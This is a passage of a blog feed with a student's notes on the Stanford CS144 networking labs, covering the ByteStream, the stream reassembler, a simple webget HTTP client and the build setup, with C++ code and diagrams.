class="type">const</span> </span>&#123; <span class="keyword">return</span> _capacity - _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">buffer_size</span>(); &#125;</span><br></pre></td></tr></table></figure><p>I will not paste the test results: the running time differs from machine to machine, so the numbers are not comparable.</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes on CS144 Computer Networking Lab2 - implementing the TCP receiver, TCPReceiver&lt;/p&gt;
&lt;p&gt;CS144 Lab2 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab2.pdf&quot;&gt;Lab Checkpoint 2: the TCP receiver&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab1</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab1/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab1/</id>
    <published>2021-11-04T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.908Z</updated>
    
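    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes on CS144 Computer Networking Lab1 - the stream reassembler, StreamReassembler</p><p>CS144 Lab1 handout - <a href="https://cs144.github.io/assignments/lab1.pdf">Lab Checkpoint 1: stitching substrings into a byte stream</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><p>PS: Before starting CS144, it is best to learn some networking theory first, or read my earlier <a href="https://kiprey.github.io/2021/05/cnatda-1/#4-%E9%9D%A2%E5%90%91%E8%BF%9E%E6%8E%A5%E7%9A%84%E8%BF%90%E8%BE%93%EF%BC%9ATCP">notes</a></p><span id="more"></span><h2 id="二、实验结构">II. Lab Structure</h2><p>This figure shows the complete structure of the CS144 labs:</p><p><img src="/2021/11/cs144-lab1/image-20211105142904316.png" alt="image-20211105142904316"></p><p>Here, <code>ByteStream</code> is what we already implemented in Lab0.</p><p>In the following labs we will implement, in order:</p><ul><li>Lab1 <code>StreamReassembler</code>: a stream reassembler, a module that stitches substrings (small pieces) of a byte stream back into a contiguous byte stream in the correct order.</li><li>Lab2 <code>TCPReceiver</code>: the part of TCP that handles the inbound byte stream.</li><li>Lab3 <code>TCPSender</code>: the part of TCP that handles the outbound byte stream.</li><li>Lab4 <code>TCPConnection</code>: combines the previous work into a working TCP implementation. In the end we can use this TCP implementation to talk to real-world servers.</li></ul><blockquote><p>The labs guide us to build a TCP implementation in a modular way.</p></blockquote><p>The stream reassembler plays an important role in TCP. Because of the constraints of the network, a TCP sender cuts its data into small segments and sends them in batches. This introduces new problems: segments may be lost, reordered, or retransmitted several times in transit. The TCP receiver therefore relies on the stream reassembler to put <strong>these reordered, retransmitted segments</strong> back together into a contiguous byte stream.</p><h2 id="三、环境配置">III. Environment Setup</h2><p>Our lab code currently lives on the <code>master</code> branch. Before working on Lab1 we need to merge the Lab1 starter code, so run the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab1-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="四、如何调试">IV. How to Debug</h2><p>First build a Debug version with cmake &amp;&amp; make.</p><p>All the test programs are located in <code>build/tests/</code>. Start by running them by hand, one at a time.</p><p>If one of them prints an error message, debug it with gdb.</p><h2 id="五、StreamReassembler-实现">V. StreamReassembler Implementation</h2><h3 id="1-要求">1. 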
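Requirements</h3><p>The stream reassembler we implement has the following properties:</p><ul><li><p>It receives substrings. Each substring consists of a run of bytes plus the <strong>index of its first byte</strong> within the <strong>overall stream</strong>.</p><blockquote><p>Starting to smell like TCP, isn't it :-)  If you are interested, have a look at the structure of a real-world TCP segment - <a href="https://kiprey.github.io/2021/05/cnatda-1/#a-TCP%E6%8A%A5%E6%96%87%E6%AE%B5%E7%BB%93%E6%9E%84">Kiprey Blog</a></p></blockquote></li><li><p>Every byte of the stream has its own unique index, counting up from zero.</p></li><li><p>StreamReassembler owns a ByteStream for output. As soon as the reassembler knows the next byte of the stream, it writes that byte into the ByteStream.</p></li></ul><p>Note that among the incoming substrings:</p><ul><li><p>Substrings may duplicate each other and may overlap.</p><blockquote><p>We assume, however, that overlapping parts carry identical data.</p><p>That is, the data at a given index never differs between one substring and another.</p></blockquote><blockquote><p>Handling the overlaps is the most troublesome part.</p></blockquote></li><li><p>Some of the data passed in may already have been assembled.</p></li><li><p>If the ByteStream is full, assembly must pause and the unassembled data must be stored temporarily.</p></li></ul><p>In addition to the requirements above, the capacity must be strictly enforced:</p><p><img src="/2021/11/cs144-lab1/image-20211107124153476.png" alt="image-20211107124153476"></p><p>For ease of explanation, call the <strong>green region</strong> in the figure ByteStream, and call the <strong>memory range that holds the red regions (i.e. first unassembled - first unacceptable)</strong> Unassembled_strs.</p><p>CS144 requires that the <strong>total memory used by ByteStream + Unassembled_strs</strong> stays within <strong>the capacity passed to the Reassembler constructor</strong>. So when constructing the Reassembler, we use the capacity argument both as the upper bound of the <code>ByteStream</code> buffer and as the size of the <strong>first unassembled - first unacceptable</strong> range, to bound memory use in extreme cases.</p><blockquote><p>Note: the size of the <strong>first unassembled - first unacceptable</strong> range is not the same thing as <strong>the memory limit of the data structure that stores unassembled substrings</strong>. Do not mix them up.</p></blockquote><p>The capacity concept matters: it not only limits memory use but also plays a role in flow control (see lab2).</p><h3 id="2-实现思路">2. 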
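Approach</h3><p>Overall, the requirements at this stage are fairly simple, but there are quite a few cases to consider.</p><p>Before going through the cases, let us define a few variables that describe the current state:</p><ul><li><code>_next_assembled_idx</code>: the index of the next byte to be assembled</li><li><code>_unassembled_strs</code>: a map from byte index to data substring</li><li><code>_eof_idx</code>: the byte index that represents EOF</li></ul><p>These are the cases that need to be handled:</p><ol><li><p><code>index &lt;=  _next_assembled_idx &amp;&amp; index + data.size() &gt; _next_assembled_idx</code></p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">index    _next_assembled_idx   index+data.size()   </span><br><span class="line">  V               V                   V </span><br><span class="line">--+-----------------------------------+-----------------------------</span><br><span class="line">  |///////////////|///////////////////|</span><br><span class="line">--+-----------------------------------+-----------------------------</span><br></pre></td></tr></table></figure><p>In this case we can first cut off:</p><ul><li>the leading part that has already been assembled</li><li>the trailing part that overlaps <strong>data already stored in _unassembled_strs</strong></li></ul><p>Truncating this way ensures that newly assembled data never overlaps the data stored in _unassembled_strs, which simplifies the logic.</p><p>After that, the data can be assembled directly with no further processing.</p><p>If it does not fit, i.e. <code>_output</code> is full, it has to be put into the pending queue <code>_unassembled_strs</code> to wait for assembly.</p></li><li><p><code>index &gt; _next_assembled_idx</code></p><p>This case needs careful thought, because the data may overlap unassembled substrings that are already stored, which would waste a lot of memory and cause useless repeated processing. There are several sub-cases for both the start and the end position of the incoming data.</p><blockquote><p>For ease of explanation, we call the stored data in <code>_unassembled_strs</code> whose index is <strong>smaller than and closest to</strong> index up_data, and its start position up_idx.<br>down_data and down_idx are defined likewise: the stored data in <code>_unassembled_strs</code> whose index is larger than and closest to the incoming index, and its start position.</p><p>up means the direction before the data, down the direction after it.</p></blockquote><p>First, the sub-cases for the head of the incoming data:</p><ol><li><p>If up_idx + up_data.size() &lt;= index, the incoming data does not overlap the previous stored substring. Nothing needs to be done.</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span 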
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx                  index  </span><br><span class="line">          V            V    up_data.size      V </span><br><span class="line">----------+------------+------------------+---+-----------------...</span><br><span class="line">          |            |++++++++++++++++++|   |\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+------------------+---+-----------------...</span><br></pre></td></tr></table></figure></li><li><p>If up_idx + up_data.size() &gt; index, the front part of the incoming data overlaps. It must be truncated, and index must be updated after the truncation.</p><p>Before truncation:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx       up_idx+up_data.size     </span><br><span class="line">          V            V                  V </span><br><span class="line">----------+------------+-----------+------+-----------------...</span><br><span class="line">          |            |+++++++++++|+/+/+/|\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+-----------+------+-----------------...</span><br><span class="line">                                   A</span><br><span class="line">                                 index</span><br></pre></td></tr></table></figure><p>After truncation:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br></pre></td><td class="code"><pre><span class="line">_next_assembled_idx  up_idx       up_idx+up_data.size     </span><br><span class="line">          V            V                  V </span><br><span class="line">----------+------------+------------------+-----------------...</span><br><span class="line">          |            |++++++++++++++++++|\\\\\\\\\\\\\\\\\...</span><br><span class="line">----------+------------+------------------+-----------------...</span><br><span class="line">                                          A</span><br><span class="line">                                        new_idx</span><br></pre></td></tr></table></figure></li></ol><p>The sub-cases for the tail of the incoming data are different:</p><ol><li><p>If index + data.size() &lt;= down_idx, the back part of the data does not overlap anything, and nothing needs to be done.</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> index      index+data.size  down_idx</span><br><span class="line">   V               V            V</span><br><span class="line">---+---------------+------------+------------------...</span><br><span class="line">   |///////////////|            |++++++++++++++++++...</span><br><span class="line">---+---------------+------------+------------------...</span><br></pre></td></tr></table></figure></li><li><p>If index + data.size() &gt; down_idx, the back part overlaps. This again splits into two sub-cases:</p><ol><li><p><code>index + data.size() &lt; down_idx + down_data.size()</code>: the ordinary partial overlap. Just cut off the overlapping part.</p><p>Before truncation:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> 
index              index+data.size   </span><br><span class="line">   V                       V  </span><br><span class="line">---+---------------+-------+------------+-----...</span><br><span class="line">   |///////////////|+/+/+/+|++++++++++++|     ...</span><br><span class="line">---+---------------+-------+------------+-----...</span><br><span class="line">                   A                    A</span><br><span class="line">                down_idx       down_idx+down_data.size</span><br></pre></td></tr></table></figure><p>After truncation:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index       index+data.size   </span><br><span class="line">   V               V  </span><br><span class="line">---+------------------------------------+-----...</span><br><span class="line">   |///////////////|++++++++++++++++++++|     ...</span><br><span class="line">---+------------------------------------+-----...</span><br><span class="line">                   A                    A</span><br><span class="line">                down_idx       down_idx+down_data.size</span><br></pre></td></tr></table></figure></li><li><p><code>index + data.size() &gt;= down_idx + down_data.size()</code>: a complete overlap. The incoming data <strong>fully covers</strong> the next stored data, so that stored data is discarded.</p><p>Note: when a full cover occurs, the check must be <strong>repeated</strong>, comparing index + data.size() against the <strong>end</strong> position of <strong>the new next data that follows the one just discarded</strong>, because the incoming data may <strong>cover several</strong> stored substrings at once.</p><p>Before processing:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index                          index+data.size   </span><br><span class="line">   V                                    V  </span><br><span class="line">---+-----+--------------------+---------+-----+------...</span><br><span class="line">   |/////|/+/+/+/+/+/+/+/+/+/+|/////////|     |++++++...</span><br><span class="line">---+-----+--------------------+---------+-----+------...</span><br><span class="line">         A                    A                 </span><br><span class="line">      down_idx       down_idx+down_data.size   </span><br></pre></td></tr></table></figure><p>After processing:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> index                          index+data.size   </span><br><span class="line">   V                                    V  </span><br><span class="line">---+------------------------------------+-----+------...</span><br><span class="line">   |////////////////////////////////////|     |++++++...</span><br><span class="line">---+------------------------------------+-----+------...</span><br><span class="line">                                              A</span><br><span class="line">                                         new down_idx</span><br></pre></td></tr></table></figure></li></ol></li></ol></li></ol><p>The handling described above guarantees that <strong>the substrings in _unassembled_strs never overlap each other, which improves memory efficiency</strong>. It trades time for space: in my view, data received from an unreliable network is precious, more so than the processing time saved by skipping these checks.</p><p>EOF must be implemented strictly as the lab handout specifies. When the eof argument is true, it means that <strong>the last byte of the incoming substring is the last byte of the whole stream</strong>. It does not mean that this is the last call that passes a substring to the reassembler. So the eof_idx has to be stored separately, and after each reassembly step we check whether the EOF position has been reached.</p><h3 id="3-具体实现">3. 
Implementation</h3><p>The code has been uploaded to GitHub:</p><ul><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/stream_reassembler.hh">stream_reassembler.hh</a></li><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/stream_reassembler.cc">stream_reassembler.cc</a></li></ul><p>Below are the test results. The total test time is under 0.5s, which is acceptable.</p><p><img src="/2021/11/cs144-lab1/image-20211107094807715.png" alt="image-20211107094807715"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes on CS144 Computer Networking Lab1 - the stream reassembler, StreamReassembler&lt;/p&gt;
&lt;p&gt;CS144 Lab1 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab1.pdf&quot;&gt;Lab Checkpoint 1: stitching substrings into a byte stream&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;PS: Before starting CS144, it is best to learn some networking theory first, or read my earlier &lt;a href=&quot;https://kiprey.github.io/2021/05/cnatda-1/#4-%E9%9D%A2%E5%90%91%E8%BF%9E%E6%8E%A5%E7%9A%84%E8%BF%90%E8%BE%93%EF%BC%9ATCP&quot;&gt;notes&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab0</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab0/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab0/</id>
    <published>2021-11-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.906Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>This post records the steps I took to set up the CS144 Computer Networking lab environment.</p><p>CS144 Lab0 handout - <a href="https://cs144.github.io/assignments/lab0.pdf">Lab Checkpoint 0: networking warmup</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><p>If you are using your own Linux system, just follow this guide - <a href="https://stanford.edu/class/cs144/vm_howto/vm-howto-byo.html">BYO Linux installation</a>.</p><p>Since my Linux box already had most of the tools installed, I only needed to add doxygen and clang-format:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install doxygen clang-format</span><br></pre></td></tr></table></figure><p>Then download the CS144 lab code and build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive git@github.com:Kiprey/sponge.git</span><br><span class="line"><span class="built_in">mkdir</span> -p sponge/build</span><br><span class="line"><span class="built_in">cd</span> sponge/build</span><br><span class="line">cmake ..</span><br><span class="line">make</span><br></pre></td></tr></table></figure><p>When running cmake, one of several build types can be selected:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">-DCMAKE_BUILD_TYPE=Release   <span class="comment"># optimizations</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=Debug     <span class="comment"># debug symbols and -Og</span></span><br><span 
class="line">-DCMAKE_BUILD_TYPE=RelASan   <span class="comment"># release build with ASan and UBSan</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=RelTSan   <span class="comment"># release build with ThreadSan (I doubt this one will be needed)</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=DebugASan <span class="comment"># debug build with ASan and UBSan</span></span><br><span class="line">-DCMAKE_BUILD_TYPE=DebugTSan <span class="comment"># debug build with ThreadSan</span></span><br></pre></td></tr></table></figure><p>make also offers a number of useful targets. Only the most commonly used ones are listed here:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">make doc     <span class="comment"># generate local static docs in build/doc, open index.html to browse</span></span><br><span class="line">make format  <span class="comment"># format the code with the clang tooling</span></span><br><span class="line">make <span class="built_in">help</span>    <span class="comment"># list all available make targets</span></span><br><span class="line">make check_* <span class="comment"># run the checks against your code</span></span><br></pre></td></tr></table></figure><h2 id="三、代码风格">III. Code Style</h2><p>The CS144 labs are written in a modern C++ style (C++11 and later features), with strict rules on how the code is written:</p><ul><li><p>Use the Resource acquisition is initialization style, i.e. RAII.</p></li><li><p>Do not use malloc or free.</p></li><li><p>Do not use the new or delete keywords.</p></li><li><p>Do not use raw pointers (*). If a pointer is really needed, prefer a smart pointer (unique_ptr and so on).</p><blockquote><p>The CS144 handout states that the labs should not need pointers at all.</p></blockquote></li><li><p>Do not use templates, threads, locks, or virtual functions.</p></li><li><p>Do not use C-style strings (char*) or the C string functions. Use string instead.</p></li><li><p>Do not use C-style casts. If a cast is really needed, use <code>static_cast</code>.</p></li><li><p>Pass function arguments by const reference (const Ty&amp; t).</p></li><li><p>Declare every variable and method const wherever possible.</p></li><li><p>Do not use global variables, and give every variable the smallest scope possible.</p></li><li><p>After finishing the code, always run <code>make format</code> to normalize the code style.</p></li></ul><h2 id="四、尝试手动访问网页">IV. Fetching a Web Page by Hand</h2><p>Run <code>telnet cs144.keithw.org 
http</code>命令以连接远程网页服务器，之后在终端键入以下内容</p><blockquote><p>内容中的<code>&lt;enter&gt;</code>指的是按下回车符</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET /hello HTTP/1.1&lt;enter&gt;</span><br><span class="line">Host: cs144.keithw.org&lt;enter&gt;</span><br><span class="line">Connection: close&lt;enter&gt;</span><br><span class="line">&lt;enter&gt;</span><br></pre></td></tr></table></figure><p>之后就可以看到远程服务器将内容正确返回:</p><p><img src="/2021/11/cs144-lab0/image-20211105091331646.png" alt="image-20211105091331646"></p><p>比较有意思的是， telnet 在进行 http 访问下，会自动将用户输入的换行转化为 <code>\r\n</code>，而 nc 程序不会这样做。</p><h2 id="五、-动手实现一个网络程序">五、 动手实现一个网络程序</h2><p>这里我们需要实现一个程序 <code>webget</code>，用于访问外部网页，类似于 wget。</p><p>代码量预计 10 行左右，位于<code>apps/webget.cc</code>，实现代码时务必借助 libsponge 中的 <code>TCPSocket</code> 和 <code>Address</code> 类来完成。</p><p>需要注意的是</p><ul><li><p>HTTP 头部的每一行末尾都是以<code>\r\n</code>结尾，而不是<code>\n</code></p></li><li><p>需要包含<code>Connection: close</code> 的HTTP头部，以指示远程服务器在处理完当前请求后直接关闭。</p></li><li><p>除非获取到EOF，否则必须<strong>循环</strong>从远程服务器读取信息。</p><p>因为网络数据的传输可能断断续续，需要多次 read。</p></li></ul><p>这里贴出我的实现方式：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_URL</span><span class="params">(<span class="type">const</span> string &amp;host, <span class="type">const</span> string &amp;path)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Your code here.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// You will need to connect to the &quot;http&quot; service on</span></span><br><span class="line">    <span class="comment">// the computer whose name is in the &quot;host&quot; string,</span></span><br><span class="line">    <span class="comment">// then request the URL path given in the &quot;path&quot; string.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Then you&#x27;ll need to print out everything the server sends back,</span></span><br><span class="line">    <span class="comment">// (not just one call to read() -- everything) until you reach</span></span><br><span class="line">    <span class="comment">// the &quot;eof&quot; (end of file).</span></span><br><span class="line"></span><br><span class="line">    <span class="function">Address <span class="title">addr</span><span class="params">(host, <span class="string">&quot;http&quot;</span>)</span></span>;</span><br><span class="line">    TCPSocket http_tcp;</span><br><span class="line">    http_tcp.<span class="built_in">connect</span>(addr);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;GET &quot;</span> + path + <span class="string">&quot; HTTP/1.1\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;HOST: &quot;</span> + host + <span 
class="string">&quot;\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;Connection: close\r\n&quot;</span>);</span><br><span class="line">    http_tcp.<span class="built_in">write</span>(<span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(!http_tcp.<span class="built_in">eof</span>())</span><br><span class="line">        cout &lt;&lt; http_tcp.<span class="built_in">read</span>();</span><br><span class="line">    http_tcp.<span class="built_in">close</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>It runs successfully:</p><p><img src="/2021/11/cs144-lab0/image-20211105103200309.png" alt="image-20211105103200309"></p><h2 id="六、实现Lab0">VI. Implementing Lab0</h2><p>Lab0 asks us to implement an <strong>in-memory</strong> ordered, reliable byte stream (somewhat like a pipe).</p><p>Requirements:</p><ul><li><p>Bytes are written at the <strong>input side</strong> and can be read, <strong>in the same order</strong>, from the <strong>output side</strong>.</p></li><li><p>The byte stream is finite: the writer can end the input. Once the reader has read to the end of the stream, it reaches EOF and no more bytes can be read.</p></li><li><p>The byte stream must be <strong>flow-controlled</strong> to limit memory use. When the buffer is full, writes are refused until the reader has read some data and freed up buffer space.</p></li><li><p>The stream being written may be very long, so the case where the stream is larger than the buffer must be handled. Even with a buffer of only 1 byte, the implementation must still support normal writes and reads.</p></li></ul><blockquote><p>The code runs in a single thread, so there is no need to worry about race conditions.</p></blockquote><p>This is an ordered, reliable byte stream <strong>in memory</strong>. The following labs will have us implement such a reliable byte stream over an <strong>unreliable network</strong>, which is exactly the <strong>Transmission Control Protocol (TCP)</strong>.</p><p>The implementation follows.</p><p>First the class declaration, to which I added a few private members to hold the stream's state:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span 
class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">ByteStream</span> &#123;</span><br><span class="line">  <span class="keyword">private</span>:</span><br><span class="line">    <span class="comment">// Your code here -- add private members as necessary.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Hint: This doesn&#x27;t need to be a sophisticated data structure at</span></span><br><span class="line">    <span class="comment">// all, but if any of your tests are taking longer than a second,</span></span><br><span class="line">    <span class="comment">// that&#x27;s a sign that you probably want to keep exploring</span></span><br><span class="line">    <span class="comment">// different approaches.</span></span><br><span class="line">    std::deque&lt;<span class="type">char</span>&gt; _queue;</span><br><span class="line">    <span class="type">size_t</span> _capacity_size;</span><br><span class="line">    <span class="type">size_t</span> _written_size;</span><br><span class="line">    <span class="type">size_t</span> _read_size;</span><br><span class="line">    <span class="type">bool</span> _end_input;</span><br><span class="line">    <span class="type">bool</span> _error&#123;&#125;;  <span class="comment">//!&lt; Flag indicating that the stream suffered an error.</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">//! Construct a stream with room for `capacity` bytes.</span></span><br><span class="line">    <span class="built_in">ByteStream</span>(<span class="type">const</span> <span class="type">size_t</span> capacity);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
\name &quot;Input&quot; interface for the writer</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Write a string of bytes into the stream. Write as many</span></span><br><span class="line">    <span class="comment">//! as will fit, and return how many were written.</span></span><br><span class="line">    <span class="comment">//! \returns the number of bytes accepted into the stream</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">write</span><span class="params">(<span class="type">const</span> std::string &amp;data)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns the number of additional bytes that the stream has space for</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">remaining_capacity</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Signal that the byte stream has reached its ending</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">end_input</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Indicate that the stream suffered an error.</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">set_error</span><span class="params">()</span> </span>&#123; _error = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
